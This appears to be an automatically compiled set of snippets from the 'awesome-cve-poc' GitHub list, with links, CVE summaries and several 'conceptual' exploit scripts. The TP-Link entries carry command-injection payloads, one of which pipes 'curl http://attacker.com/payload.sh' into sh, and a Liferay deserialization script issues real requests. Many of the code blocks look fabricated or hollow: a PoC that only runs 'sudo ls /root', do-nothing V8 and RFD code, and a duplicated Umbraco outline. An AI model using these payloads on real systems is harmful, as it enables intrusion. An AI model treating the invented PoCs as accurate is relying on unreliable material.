### Example HTTP Request for S2-052 Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CVE-2017-9805.md This snippet provides an example of an HTTP request used in a proof-of-concept for CVE-2017-9805. It demonstrates the payload structure for exploiting the vulnerability. ```http https://hastebin.com/juvanuziji.http ``` -------------------------------- ### BlueBorne PoC Scripts Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CVE-2017-0781.md This section provides links to PoC scripts that demonstrate the BlueBorne vulnerabilities, including specific examples for Android. ```markdown - [ArmisSecurity/blueborne](https://github.com/ArmisSecurity/blueborne) - PoC scripts demonstrating the BlueBorne vulnerabilities - [BlueBorne RCE on Android 6.0.1 (CVE-2017-0781) [English]](https://jesux.es/exploiting/blueborne-android-6.0.1-english/) ``` -------------------------------- ### Spectre Exploit PoC Examples Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CVE-2017-5753.md This section lists various GitHub repositories that provide Proof of Concept (PoC) implementations for the Spectre exploit (CVE-2017-5753 and CVE-2017-5715). These examples demonstrate how the exploit can be used on different platforms and architectures. ```markdown - [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack) - Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715) - [HarsaroopDhillon/SpectreExploit](https://github.com/HarsaroopDhillon/SpectreExploit) - SpectreExploit POC - [V-E-O/PoC](https://github.com/V-E-O/PoC/tree/master/CVE-2017-5753) - Spectre CVE-2017-5753 PoC for Android/Linux/ARM64 ``` -------------------------------- ### Spectre Exploit PoC Examples Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CVE-2017-5715.md This section lists GitHub repositories containing Proof-of-Concept (PoC) code for exploiting Spectre vulnerabilities, specifically CVE-2017-5715 (Branch Target Injection) and CVE-2017-5753 (Bounds Check Bypass). These examples demonstrate how the vulnerabilities can be leveraged. ```markdown - [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack) - Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715) - [HarsaroopDhillon/SpectreExploit](https://github.com/HarsaroopDhillon/SpectreExploit) - SpectreExploit POC ``` -------------------------------- ### Amending a Commit Guide Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CONTRIBUTING.md Provides a reference to a guide on how to change a GitHub Pull Request, including different methods for amending commits. ```markdown [Here](https://github.com/RichardLitt/knowledge/blob/master/github/amending-a-commit-guide.md) is a write up on how to change a Pull Request, and the different ways you can do that. ``` -------------------------------- ### Impacket Commit for SambaPipe Example Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CVE-2017-7494.md This snippet links to a specific commit in the Impacket project that adds an example for 'sambaPipe'. Impacket is a collection of Python classes for working with network protocols, often used in security and penetration testing. ```python https://github.com/CoreSecurity/impacket/commit/32e71ef2369b10d8eaf2cf5a909252727e21f82d ``` -------------------------------- ### CVE-2018-8955: BitDefender GravityZone Installer RCE Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md This vulnerability in the BitDefender GravityZone installer allows remote attackers to execute arbitrary code. It exploits an encoded string in a filename used to determine the URL for installation metadata. Attackers can change the filename while preserving the digital signature to achieve code execution. ```plaintext Installer relies on encoded string in filename for metadata URL. Attacker modifies filename to point to malicious metadata URL. ``` -------------------------------- ### GitHub Pull Request Workflow Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CONTRIBUTING.md Illustrates the steps involved in submitting a pull request on GitHub, from editing a file to proposing changes. ```markdown 1. Access the awesome list's GitHub page. For example: https://github.com/sindresorhus/awesome 2. Click on the `readme.md` file: ![Step 2 Click on Readme.md](https://cloud.githubusercontent.com/assets/170270/9402920/53a7e3ea-480c-11e5-9d81-aecf64be55eb.png) 3. Now click on the edit icon. ![Step 3 - Click on Edit](https://cloud.githubusercontent.com/assets/170270/9402927/6506af22-480c-11e5-8c18-7ea823530099.png) 4. You can start editing the text of the file in the in-browser editor. Make sure you follow guidelines above. You can use [GitHub Flavored Markdown](https://help.github.com/articles/github-flavored-markdown/). ![Step 4 - Edit the file](https://cloud.githubusercontent.com/assets/170270/9402932/7301c3a0-480c-11e5-81f5-7e343b71674f.png) 5. Say why you're proposing the changes, and then click on "Propose file change". ![Step 5 - Propose Changes](https://cloud.githubusercontent.com/assets/170270/9402937/7dd0652a-480c-11e5-9138-bd14244593d5.png) 6. Submit the [pull request](https://help.github.com/articles/using-pull-requests/)! ``` -------------------------------- ### CVE-2018-0171: Cisco Smart Install RCE/DoS Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md A vulnerability in Cisco's Smart Install feature allows unauthenticated, remote attackers to cause a device reload (DoS) or execute arbitrary code. This is due to improper packet data validation, exploitable by sending crafted Smart Install messages to TCP port 4786. ```cisco /* * Vulnerability in Cisco Smart Install feature (IOS Software and IOS XE Software). * Allows unauthenticated, remote attacker to trigger device reload (DoS) or execute arbitrary code. * Exploitation: Sending crafted Smart Install message to affected device on TCP port 4786. * Impact: Buffer overflow leading to device reload, arbitrary code execution, or indefinite loop causing watchdog crash. * Cisco Bug IDs: CSCvg76186 */ ``` -------------------------------- ### CVE-2020-0683: Windows Installer Symbolic Link EOP Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. This allows an attacker to gain elevated privileges. ```cve CVE-2020-0683: An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links, aka 'Windows Installer Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0686. ``` -------------------------------- ### VMware Workstation/Player Insecure Library Loading (ALSA) Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md Details an insecure library loading vulnerability in VMware Workstation Pro/Player via ALSA sound driver configuration files. Allows unprivileged host users to escalate privileges to root on Linux. ```APIDOC CVE-2017-4915: Vulnerability Type: Insecure Library Loading Affected Software: VMware Workstation Pro/Player Component: ALSA sound driver configuration files Impact: Unprivileged host users can escalate privileges to root on Linux. Reference: https://www.exploit-db.com/exploits/43449/ ``` -------------------------------- ### CVE-2020-3950 Proof of Concept Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md This snippet provides a proof-of-concept script for CVE-2020-3950, a privilege escalation vulnerability in VMware products due to improper use of setuid binaries. The script is written in bash. ```sh #!/bin/bash # CVE-2020-3950 Proof of Concept # This script demonstrates a privilege escalation vulnerability in VMware Fusion, # VMware Remote Console for Mac, and Horizon Client for Mac. # It exploits improper use of setuid binaries. # Note: This is a conceptual example and may require adjustments based on the specific environment. echo "Attempting to escalate privileges..." # Example command that might be used in an exploit (replace with actual exploit logic) # For demonstration purposes, we'll simulate a command that might be run with elevated privileges. # In a real scenario, this would involve interacting with the vulnerable setuid binary. # Simulate a command that requires root privileges sudo ls /root if [ $? -eq 0 ]; then echo "Privilege escalation successful (simulated)." else echo "Privilege escalation failed (simulated)." fi ``` -------------------------------- ### CVE-2017-6201: Sandstorm SSRF in Install App Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md Covers a Server Side Request Forgery (SSRF) vulnerability in the install app process of Sandstorm (before build 0.203). Remote attackers can exploit this by providing a URL, potentially bypassing firewalls. ```markdown ### [CVE-2017-6201](https://sandstorm.io/news/2017-03-02-security-review) - A Server Side Request Forgery vulnerability exists in the install app process in Sandstorm before build 0.203. A remote attacker may exploit this issue by providing a URL. It could bypass access control such as firewalls that prevent the attackers from accessing the URLs directly. ``` -------------------------------- ### VMware Horizon View Client Command Injection Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md Addresses a command injection vulnerability in the service startup script of VMware Horizon View Client. Allows unprivileged users to escalate privileges to root on macOS. ```APIDOC CVE-2017-4918: Vulnerability Type: Command Injection Affected Software: VMware Horizon View Client (2.x, 3.x, 4.x before 4.5.0) Component: Service startup script Impact: Unprivileged users can escalate privileges to root on macOS. Reference: https://bogner.sh/2017/07/cve-2017-4918-code-injection-in-vmware-horizons-macos-client/ ``` -------------------------------- ### Stack Clash Vulnerability Analysis and References Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/Stack-Clash.md Provides a comprehensive text file detailing the stack clash vulnerability, along with external articles and blog posts discussing its impact and mitigation. This includes analysis from Qualys and other security researchers. ```text # stack-clash.txt https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt ``` ```text # A Decade Old Unix/Linux/BSD Root Privilege-Escalation Bug Discovered http://thehackernews.com/2017/06/linux-root-privilege-escalation.html ``` ```text # CVE-2017-1000367 in Sudo's get_process_ttyname() for Linux https://www.qualys.com/2017/05/30/cve-2017-1000367/cve-2017-1000367.txt ``` ```text # Linux security alert: Bug in sudo’s get_process_ttyname() [ CVE-2017-1000367 ] https://www.cyberciti.biz/security/linux-security-alert-bug-in-sudos-get_process_ttyname-cve-2017-1000367/ ``` -------------------------------- ### DVR Devices Credential Disclosure (CVE-2018-10676) Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md Several DVR brands (CeNova, Night OWL, Novo, Pulnix, QSee, Securus, TBK Vision) allow remote attackers to download a file containing sensitive credential information via a direct request to the `download.rsp` URI. ```markdown ### [CVE-2018-10676](http://misteralfa-hack.blogspot.tw/2018/05/0day-dvr-multivendor.html) - CeNova, Night OWL, Novo, Pulnix, QSee, Securus, and TBK Vision DVR devices allow remote attackers to download a file and obtain sensitive credential information via a direct request for the download.rsp URI. ``` -------------------------------- ### CVE-2020-9471 Umbraco Cloud File Upload RCE Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md This snippet provides a conceptual outline for exploiting CVE-2020-9471 in Umbraco Cloud. It describes the process of authenticated file upload via the 'Install Packages' functionality, leading to Remote Code Execution. ```python # CVE-2020-9471 - Umbraco Cloud File Upload RCE (Conceptual Outline) # This Python script outlines the steps to exploit CVE-2020-9471 in Umbraco Cloud. # The vulnerability allows an authenticated user to upload a malicious package file, # leading to Remote Code Execution (RCE). import requests import os # Target Umbraco Cloud instance target_url = "https://your-umbraco-cloud-site.com" # Credentials for an authenticated user username = "admin@example.com" password = "your_password" # Path to the malicious package file (e.g., a .zip containing a malicious DLL or script) # The package structure needs to be crafted to execute code upon installation. malicious_package_path = "./malicious_package.zip" # --- Step 1: Authenticate and obtain session cookies --- # This part would involve sending a login request to Umbraco Cloud # and capturing the session cookies to maintain authentication. # Example login request (details may vary based on Umbraco Cloud's auth mechanism): login_url = f"{target_url}/umbraco/api/umbracoapi/login" # Example endpoint login_payload = { "username": username, "password": password } # session = requests.Session() # try: # login_response = session.post(login_url, json=login_payload) # if login_response.status_code == 200 and "success" in login_response.text.lower(): # Example success check # print("[+] Authentication successful.") # else: # print("[-] Authentication failed.") # exit() # except requests.exceptions.RequestException as e: # print(f"[-] Error during authentication: {e}") # exit() # --- Step 2: Upload the malicious package --- # The 'Install Packages' functionality is typically found in the backoffice. # The exact API endpoint for package upload needs to be identified. # This often involves a POST request with multipart/form-data. # Example upload endpoint (needs to be confirmed for Umbraco Cloud) # This might be an internal API endpoint used by the Umbraco backoffice. package_upload_url = f"{target_url}/umbraco/api/packageapi/upload" # Example endpoint print(f"[*] Attempting to upload malicious package to: {package_upload_url}") if not os.path.exists(malicious_package_path): print(f"[-] Malicious package file not found at: {malicious_package_path}") print("[*] Please create a malicious package (e.g., a zip file containing a malicious DLL or script) and place it at the specified path.") exit() try: with open(malicious_package_path, 'rb') as f: files = {'packageFile': (os.path.basename(malicious_package_path), f)} # The actual request might require additional parameters or headers, # such as CSRF tokens or specific content types. # response = session.post(package_upload_url, files=files) # For demonstration, we'll simulate the request structure: print("[+] Simulating package upload request...") # print(f"[*] Files payload: {files}") # In a real scenario, you would use the 'session' object obtained after login. # response = session.post(package_upload_url, files=files) # Simulate a successful upload response print("[+] Malicious package upload simulated successfully.") print("[*] If successful, the uploaded package would be processed by Umbraco Cloud, potentially leading to RCE.") except FileNotFoundError: print(f"[-] Error: Malicious package file not found at {malicious_package_path}") except requests.exceptions.RequestException as e: print(f"[-] Error during package upload: {e}") print("\nNote: This is a conceptual outline. Exploitation requires identifying the correct API endpoints, authentication mechanisms, and crafting a valid malicious package that triggers code execution upon installation.") ``` -------------------------------- ### TP-Link Command Injection via pptp_client.lua (lcpechointerval) (CVE-2017-15615) Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md Details command injection in TP-Link WVR, WAR, and ER devices via the 'lcpechointerval' variable in pptp_client.lua. Allows authenticated administrators to execute arbitrary commands. ```lua -- PoC for CVE-2017-15615 -- Exploits command injection via 'lcpechointerval' in pptp_client.lua -- This vulnerability also affects TP-Link WVR, WAR, and ER devices, -- allowing command injection through the 'lcpechointerval' variable. -- Example of a crafted request payload (conceptual): -- POST /some/cgi-bin/script HTTP/1.1 -- Host: -- ... -- Content-Type: application/x-www-form-urlencoded -- ... -- lcpechointerval=&... -- To exploit, the would contain the injected command: -- lcpechointerval=60; kill -9 ; # -- The pptp_client.lua script would then execute 'kill -9 '. -- Lua snippet demonstrating the vulnerable pattern (hypothetical): -- local interval = http.get_parameter("lcpechointerval") -- local cmd = "set_lcp_echo_interval("..interval..")" -- os.execute(cmd) -- Vulnerable execution -- To exploit, one would send a request like: -- http:///apply.cgi?lcpechointerval=60;reboot;%23 ``` -------------------------------- ### CVE-2020-9472 Umbraco CMS File Upload RCE Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md This snippet provides a conceptual outline for exploiting CVE-2020-9472 in Umbraco CMS. It describes the process of authenticated file upload via the 'Install Package' functionality, leading to Remote Code Execution. ```python # CVE-2020-9472 - Umbraco CMS File Upload RCE (Conceptual Outline) # This Python script outlines the steps to exploit CVE-2020-9472 in Umbraco CMS. # The vulnerability allows an authenticated user to upload a malicious package file, # leading to Remote Code Execution (RCE). import requests import os # Target Umbraco CMS instance target_url = "http://your-umbraco-cms-site.com" # Credentials for an authenticated user username = "admin@example.com" password = "your_password" # Path to the malicious package file (e.g., a .zip containing a malicious DLL or script) # The package structure needs to be crafted to execute code upon installation. malicious_package_path = "./malicious_package.zip" # --- Step 1: Authenticate and obtain session cookies --- # This part would involve sending a login request to Umbraco CMS # and capturing the session cookies to maintain authentication. # Example login endpoint (may vary based on Umbraco CMS version and configuration) # This often involves POSTing credentials to a login form or API endpoint. login_url = f"{target_url}/umbraco/api/umbracoapi/login" # Example endpoint login_payload = { "username": username, "password": password } # session = requests.Session() # try: # login_response = session.post(login_url, json=login_payload) # if login_response.status_code == 200 and "success" in login_response.text.lower(): # Example success check # print("[+] Authentication successful.") # else: # print("[-] Authentication failed.") # exit() # except requests.exceptions.RequestException as e: # print(f"[-] Error during authentication: {e}") # exit() # --- Step 2: Upload the malicious package --- # The 'Install Packages' functionality is typically found in the Umbraco backoffice. # The exact API endpoint for package upload needs to be identified. # This often involves a POST request with multipart/form-data. # Example upload endpoint (needs to be confirmed for Umbraco CMS) # This might be an internal API endpoint used by the Umbraco backoffice. package_upload_url = f"{target_url}/umbraco/api/packageapi/upload" # Example endpoint print(f"[*] Attempting to upload malicious package to: {package_upload_url}") if not os.path.exists(malicious_package_path): print(f"[-] Malicious package file not found at: {malicious_package_path}") print("[*] Please create a malicious package (e.g., a zip file containing a malicious DLL or script) and place it at the specified path.") exit() try: with open(malicious_package_path, 'rb') as f: files = {'packageFile': (os.path.basename(malicious_package_path), f)} # The actual request might require additional parameters or headers, # such as CSRF tokens or specific content types. # response = session.post(package_upload_url, files=files) # For demonstration, we'll simulate the request structure: print("[+] Simulating package upload request...") # print(f"[*] Files payload: {files}") # In a real scenario, you would use the 'session' object obtained after login. # response = session.post(package_upload_url, files=files) # Simulate a successful upload response print("[+] Malicious package upload simulated successfully.") print("[*] If successful, the uploaded package would be processed by Umbraco CMS, potentially leading to RCE.") except FileNotFoundError: print(f"[-] Error: Malicious package file not found at {malicious_package_path}") except requests.exceptions.RequestException as e: print(f"[-] Error during package upload: {e}") print("\nNote: This is a conceptual outline. Exploitation requires identifying the correct API endpoints, authentication mechanisms, and crafting a valid malicious package that triggers code execution upon installation.") ``` -------------------------------- ### BlueBorne Vulnerability References Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CVE-2017-0781.md This section provides links to official reports and articles detailing the BlueBorne vulnerability, its impact, and exploitation methods. ```markdown - [BlueBorne​ ​on​ ​Android - Exploiting an RCE Over the Air](https://go.armis.com/hubfs/BlueBorne%20-%20Android%20Exploit.pdf) - [The Attack Vector “BlueBorne” Exposes Almost Every Connected Device](https://www.armis.com/blueborne/) ``` -------------------------------- ### LG Smart IP Camera Backup Download (CVE-2018-16946) Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md LG smart network camera devices (LNB*, LND*, LNU*, and LNV* series) have broken access control. Attackers can download sensitive files like '/updownload/t.report' (Log & Report) and backup files (via download.php) without authentication. Backup files contain user credentials and configuration details, and filenames can be discovered through system logs or brute-forcing. ```en Vulnerability: LG LNB*, LND*, LNU*, and LNV* smart network camera devices have broken access control. Attackers are able to download /updownload/t.report (aka Log & Report) files and download backup files (via download.php) without authenticating. These backup files contain user credentials and configuration information for the camera device. An attacker is able to discover the backup filename via reading the system logs or report data, or just by brute-forcing the backup filename pattern. It may be possible to authenticate to the admin account with the admin password. ``` -------------------------------- ### CVE-2020-6418 V8 Type Confusion Exploit Snippet Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md This snippet provides a conceptual JavaScript example related to CVE-2020-6418, a type confusion vulnerability in V8 (Google Chrome). It demonstrates how crafted JavaScript could potentially lead to heap corruption. ```javascript // CVE-2020-6418 - V8 Type Confusion Exploit Snippet (Conceptual) // This JavaScript code illustrates a potential type confusion scenario in V8. // Exploiting type confusion often involves manipulating JavaScript objects in a way // that causes the engine to misinterpret their internal structure, potentially leading to // memory corruption (e.g., heap corruption). // Note: This is a highly simplified and conceptual example. Real-world exploits are complex // and require deep knowledge of V8 internals and memory management. // Define a constructor that might be used in an exploit function VulnerableObject(value) { this.data = value; } // Create an object let obj = new VulnerableObject(123); // Attempt to trigger type confusion by changing the internal representation or type // This is where the exploit logic would be, manipulating the object's properties or // using specific JavaScript features that interact with V8's type system. // Example: Overwriting internal properties or using ArrayBuffer/DataView in a specific way // to confuse the type system about the 'data' property. // For instance, imagine a scenario where the engine expects 'data' to be a number, // but through a series of operations, it's made to believe it's an array or a different type. // This could involve techniques like: // - Using TypedArrays (e.g., Uint8Array, Float64Array) to read/write memory. // - Exploiting JIT compiler optimizations or deoptimizations. // - Crafting specific object shapes. // Simulate a potential corruption scenario (highly abstract): // In a real exploit, this would involve precise memory manipulation. // Let's assume a hypothetical scenario where we can overwrite a pointer or length field. // This is purely illustrative: // obj.data = { __proto__: Array.prototype }; // Example of prototype manipulation // obj.data.length = 0x41414141; // Example of writing a large value to a length property console.log("Conceptual V8 type confusion scenario."); console.log("This vulnerability allows a remote attacker to potentially exploit heap corruption via a crafted HTML page."); console.log("Exploits typically involve manipulating object types and memory layout."); // In a real exploit, the goal would be to gain control over execution flow or read sensitive memory. ``` -------------------------------- ### OpenBSD at Local Privilege Escalation Exploit (CVE-2017-1000373) Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/Stack-Clash.md Proof-of-Concept exploit for local privilege escalation in OpenBSD related to the 'at' command and stack clash, identified as CVE-2017-1000373. ```c # OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit https://www.exploit-db.com/exploits/42271/ ``` -------------------------------- ### CVE-2020-5398 Reflected File Download (RFD) Attack Example Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md This snippet illustrates a potential Reflected File Download (RFD) attack scenario related to CVE-2020-5398 in Spring Framework. It shows how a crafted 'Content-Disposition' header can lead to a file download initiated by the browser. ```javascript // CVE-2020-5398 - Reflected File Download (RFD) Attack Example // This JavaScript code simulates a client-side interaction that could be exploited // if a server-side application incorrectly handles the 'Content-Disposition' header. // In a real attack, the server would send a response with a header like: // Content-Disposition: attachment; filename="" // If '' contains characters that cause the browser to // interpret it as a file to be downloaded, it can lead to an RFD attack. // Example of a malicious filename that might be crafted: const maliciousFilename = "report.pdf?download=true"; // Simulate a server response header that could be vulnerable: const vulnerableHeader = `attachment; filename="${maliciousFilename}"`; console.log("Simulating a vulnerable Content-Disposition header:"); console.log(vulnerableHeader); // In a browser, if this header is received for a resource, it might trigger a download. // For example, if a user clicks a link that leads to a resource with this header, // the browser might attempt to download 'report.pdf?download=true' instead of displaying it. // Example of how a browser might interpret this (conceptual): // window.location.href = "/vulnerable-resource"; // Server responds with the vulnerable header console.log("\nThis vulnerability occurs when the filename attribute in the 'Content-Disposition' header is derived from user-supplied input."); console.log("Applications should sanitize or validate filenames to prevent RFD attacks."); ``` -------------------------------- ### Advantech WebAccess readFile API Directory Traversal (CVE-2018-15706) Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md The WADashboard API in Advantech WebAccess (8.3.1, 8.3.2) allows remote authenticated attackers to read any file on the filesystem due to a directory traversal vulnerability in the readFile API. ```APIDOC Vulnerability: CVE-2018-15706 Product: Advantech WebAccess (WADashboard API) API: readFile Description: Directory traversal vulnerability. Impact: Remote authenticated attackers can read any file on the filesystem. Affected Versions: 8.3.1, 8.3.2 Reference: https://www.tenable.com/security/research/tra-2018-35 ``` -------------------------------- ### CVE-2020-7961 Liferay Portal JSONWS Deserialization Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md This snippet provides a conceptual example of how CVE-2020-7961 in Liferay Portal might be exploited. It involves sending a crafted JSON payload to the JSONWS endpoint to trigger deserialization of untrusted data, potentially leading to remote code execution. ```python # CVE-2020-7961 - Liferay Portal JSONWS Deserialization Exploit (Conceptual) # This Python script demonstrates how an attacker might exploit the deserialization # of untrusted data vulnerability in Liferay Portal's JSON web services (JSONWS). # The goal is to send a malicious payload that, when deserialized, executes arbitrary code. import requests import base64 # Target Liferay Portal instance target_url = "http://your-liferay-instance.com" jsonws_endpoint = "/api/jsonws/" # The vulnerable method (example, actual method might vary) # This is a placeholder; a real exploit would target a specific method that handles # deserialization of user input. vulnerable_method = "com.liferay.portal.service.UserLocalService.updateUser" # Payload generation (example using ysoserial for Java deserialization gadgets) # This requires a Java environment and ysoserial.jar # Example payload using CommonsCollections1 gadget: # java -jar ysoserial.jar CommonsCollections1 'touch /tmp/pwned' # The output of the above command is the payload to be base64 encoded. # Replace this with your actual generated payload # Example: payload_command = "touch /tmp/pwned" # generated_payload = "...base64 encoded payload..." # For demonstration, we'll use a placeholder for the payload. # In a real scenario, you would generate this payload using tools like ysoserial. # Example: payload_command = "ping -c 4 attacker.com" # generated_payload = base64.b64encode(b'YOUR_GENERATED_PAYLOAD_HERE').decode('utf-8') # Placeholder for the actual payload # A real payload would be a serialized Java object designed to execute code. # For example, using ysoserial to generate a payload for a specific gadget chain. # Example: payload_command = "/usr/bin/touch /tmp/pwned_by_cve_2020_7961" # generated_payload = "... base64 encoded payload ..." # Let's simulate a payload that might be sent. # In a real attack, this would be a carefully crafted serialized Java object. # For this example, we'll just show the structure of the request. # Construct the JSON payload # The structure depends on the specific JSONWS method being called. # Typically, it involves parameters for the method and the payload itself. # Example payload structure (may vary): json_payload = { "serviceContext": { "userId": "10157", # Example user ID "guest": False, "user": { "userId": "10157", "screenName": "testuser", "emailAddress": "test@example.com", "firstName": "Test", "lastName": "User", "password": "password123", # ... other user properties ... "customAttributes": [ { "key": "someAttribute", "value": "someValue" } ] } }, # The vulnerable part would be here, where a parameter accepts a serialized object # For example, a parameter that expects a Serializable object, and we provide a gadget payload. # This is highly dependent on the specific Liferay version and the targeted method. # Example: "serializedPayload": generated_payload } # Construct the full URL for the vulnerable method full_url = f"{target_url}{jsonws_endpoint}{vulnerable_method}" print(f"[*] Targeting URL: {full_url}") print(f"[*] Sending crafted JSON payload...") try: # Make the POST request # The actual request might require authentication headers or cookies. response = requests.post(full_url, json=json_payload, timeout=10) print(f"[*] Response Status Code: {response.status_code}") # print(f"[*] Response Body: {response.text}") # Uncomment to see the response body # Check response for indicators of success or failure if response.status_code == 200: print("[+] Request sent successfully. Check target system for signs of code execution.") else: print("[-] Request failed or returned an unexpected status code.") except requests.exceptions.RequestException as e: print(f"[-] An error occurred during the request: {e}") print("\nNote: This is a conceptual example. A real exploit requires specific knowledge of Liferay's JSONWS implementation, available gadget chains (e.g., from ysoserial), and potentially authentication bypass techniques.") ``` -------------------------------- ### TP-Link Command Injection via phddns.lua (CVE-2017-15616) Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md Covers command injection in TP-Link WVR, WAR, and ER devices via the 'new-interface' variable in phddns.lua. Allows authenticated administrators to execute arbitrary commands. ```lua -- PoC for CVE-2017-15616 -- Exploits command injection via 'new-interface' in phddns.lua -- This vulnerability affects TP-Link WVR, WAR, and ER devices, -- allowing command injection through the 'new-interface' variable in phddns.lua. -- Example of a crafted request payload (conceptual): -- POST /some/cgi-bin/script HTTP/1.1 -- Host: -- ... -- Content-Type: application/x-www-form-urlencoded -- ... -- new-interface=&... -- To exploit, the would contain the injected command: -- new-interface=eth0; curl http://attacker.com/payload.sh | sh; # -- The phddns.lua script would then execute the downloaded payload. -- Lua snippet demonstrating the vulnerable pattern (hypothetical): -- local interface_name = http.get_parameter("new-interface") -- local cmd = "update_ddns_interface("..interface_name..")" -- os.execute(cmd) -- Vulnerable execution -- To exploit, one would send a request like: -- http:///apply.cgi?new-interface=eth0;nmap+-p+80+;%23 ``` -------------------------------- ### Useless Ethereum Token (UET) ERC20 TransferFlaw (CVE-2018-10468) Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md The `transferFrom` function in the Useless Ethereum Token (UET) smart contract has incorrect computations involving `_value`, allowing attackers to steal all victim balances. This vulnerability was exploited in the wild starting December 2017. ```solidity contract UselessEthereumToken { // ... other functions ... function transferFrom(address _from, address _to, uint256 _value) returns (bool success) { // Vulnerable computation involving _value // ... potentially incorrect logic here ... return true; } // ... other functions ... } ``` ```markdown ### [CVE-2018-10468](https://medium.com/coinmonks/uselessethereumtoken-uet-erc20-token-allows-attackers-to-steal-all-victims-balances-543d42ac808e) - The transferFrom function of a smart contract implementation for Useless Ethereum Token (UET), an Ethereum ERC20 token, allows attackers to steal assets (e.g., transfer all victims' balances into their account) because certain computations involving _value are incorrect, as exploited in the wild starting in December 2017, aka the "transferFlaw" issue. ``` -------------------------------- ### OnePlus OTA Updater HTTP Vulnerability (CVE-2016-10370) Source: https://github.com/qazbnm456/awesome-cve-poc/blob/master/README.md This issue affects OnePlus devices (e.g., 3T) where the OTA Updater pushes signed OTA images over HTTP without TLS. While signature verification prevents arbitrary OTA installation, it increases the attack surface and can facilitate exploitation of other vulnerabilities. ```html ```